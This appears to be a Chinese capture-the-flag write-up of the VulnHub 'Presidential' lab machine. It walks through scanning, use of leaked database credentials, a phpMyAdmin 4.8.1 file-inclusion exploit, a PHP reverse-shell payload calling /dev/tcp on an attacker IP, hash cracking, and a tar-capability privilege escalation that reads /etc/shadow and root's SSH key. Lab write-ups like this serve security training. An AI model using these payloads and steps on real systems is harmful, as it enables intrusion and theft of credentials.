靶机实战系列之Presidential靶机

admin
admin
admin
109477
文章
90
评论
2024年7月4日12:59:47评论1 views字数 2585阅读8分37秒阅读模式
靶机地址: 

https://download.vulnhub.com/presidential/Presidential.ova

内容简介:

 

主机发现

端口扫描

信息收集

备份文件

子域名爆破

phpmyadmin

密码爆破

本地文件包含

Capabilities

本地权限漏洞

SSH公钥认证

 滑至文末,获取“searchall”下载链接!

1.1 主机发现

 
arp-scan  -l

靶机实战系列之Presidential靶机

 

1.2 端口扫描

nmap -p-  192.168.144.218

靶机实战系列之Presidential靶机

nmap -p80,2082 -sV -sC  192.168.144.218

靶机实战系列之Presidential靶机

1.3 信息搜集
 

打开web页面

http://192.168.144.218/index.html

发现需要绑定域名

靶机实战系列之Presidential靶机

 

192.168.144.218 votenow.local

靶机实战系列之Presidential靶机

1.4 路径爬取

dirsearch -u    http://192.168.144.218

靶机实战系列之Presidential靶机

发现网址里面的信息如下

view-source:http://votenow.local/config.php.bak
$dbUser = "votebox";$dbPass = "casoj3FFASPsbyoRP";$dbHost = "localhost";$dbname = "votebox";

1.5 子域名爆破

gobuster  vhost  -u  http://votenow.local/    -w  /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt | grep "Status: 200"

靶机实战系列之Presidential靶机

发现子域名 datasafe.votenow.local

绑定子域名 :  

192.168.144.218 datasafe.votenow.local

http://datasafe.votenow.local/

发现phpmyadmin

1.6 phpmyadmin

利用刚才发现的账号密码登录phpmyadmin

$dbUser = "votebox";$dbPass = "casoj3FFASPsbyoRP";

 

登录进入

靶机实战系列之Presidential靶机

在user表下发现账号密码

靶机实战系列之Presidential靶机

账号

密码

admin

$2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i

http://datasafe.votenow.local/README

查看phpmyadmin版本信息

靶机实战系列之Presidential靶机

发现4.8.1版本存在文件包含漏洞

靶机实战系列之Presidential靶机

cp /usr/share/exploitdb/exploits/php/webapps/44928.txt  .
# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution# Date: 2018-06-21# Exploit Author: VulnSpy# Vendor Homepage: http://www.phpmyadmin.net# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz# Version: 4.8.0, 4.8.1# Tested on: php7 mysql5# CVE : CVE-2018-12613
1. Run SQL Query : select '<?php phpinfo();exit;?>'2. Include the session file :http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

靶机实战系列之Presidential靶机

成功!!

靶机实战系列之Presidential靶机

找到session

i2n0csdmf78kkoseno75kp4jaa9stmk7

靶机实战系列之Presidential靶机

拼接网址为

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_i2n0csdmf78kkoseno75kp4jaa9stmk7

访问该网页

靶机实战系列之Presidential靶机

文件包含成功!!

现在我们尝试反弹shell

select '<?php system("bash -i >& /dev/tcp/192.168.144.247/4444 0>&1");exit;?>'
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_seu20bv6tjd567k4ihafm3sgub4n2uq0//注意 每次 session 刷新  都要 更新 后面的链接

反弹shell成功!

靶机实战系列之Presidential靶机

1.6 密码爆破

创建文件hash 

cat hash cp  /usr/share/wordlists/rockyou.txt.gz .gunzip rockyou.txt.gzjohn --wordlist=rockyou.txt hashsu admin   // 密码为 Stella

靶机实战系列之Presidential靶机

 

靶机实战系列之Presidential靶机

爆破出密码Stella

靶机实战系列之Presidential靶机

让我们升级一下终端

python -c "import pty;pty.spawn('/bin/bash')"
1.7 Capabilities

查看权限

getcap   -r  /  2>/dev/nullls -l /usr/bin/newuidmapls -l  /usr/bin/tarS

查到tarS存在权限 有可以读+搜索权限

靶机实战系列之Presidential靶机

读取shadow信息

cd   //返回根目录tarS -cvf shadow.tar /etc/shadow   //打包lstar -xvf shadow.tar  //解压cd etcchmod 777 shadowcat shadow   // 读取文件

靶机实战系列之Presidential靶机

靶机实战系列之Presidential靶机

 

1.8 公钥认证登录
tarS -cvf k.tar /root/.ssh/id_rsatar -xvf k.tarcd root/.ssh/ssh -i id_rsa root@localhost -p 2082

靶机实战系列之Presidential靶机

成功!

原文始发于微信公众号(嗨嗨安全):靶机实战系列之Presidential靶机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月4日12:59:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机实战系列之Presidential靶机https://cn-sec.com/archives/2800902.html

发表评论

匿名网友 填写信息